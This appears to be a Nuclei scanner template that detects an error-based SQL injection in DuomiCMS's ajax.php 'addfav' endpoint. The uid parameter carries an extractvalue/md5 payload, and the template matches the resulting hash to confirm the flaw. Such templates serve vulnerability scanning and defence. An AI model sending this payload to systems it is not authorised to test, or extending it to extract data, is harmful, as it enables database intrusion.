id: duomicms-sql-injection info: name: DuomiCMS SQL Injection author: pikpikcu severity: high reference: - https://redn3ck.github.io/2016/11/01/duomiCMS/ tags: duomicms,sqli requests: - method: GET path: - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))" matchers-condition: and matchers: - type: word words: - "e0ec043b3f9e198ec09041687e4d4e8d" part: body condition: and - type: status status: - 200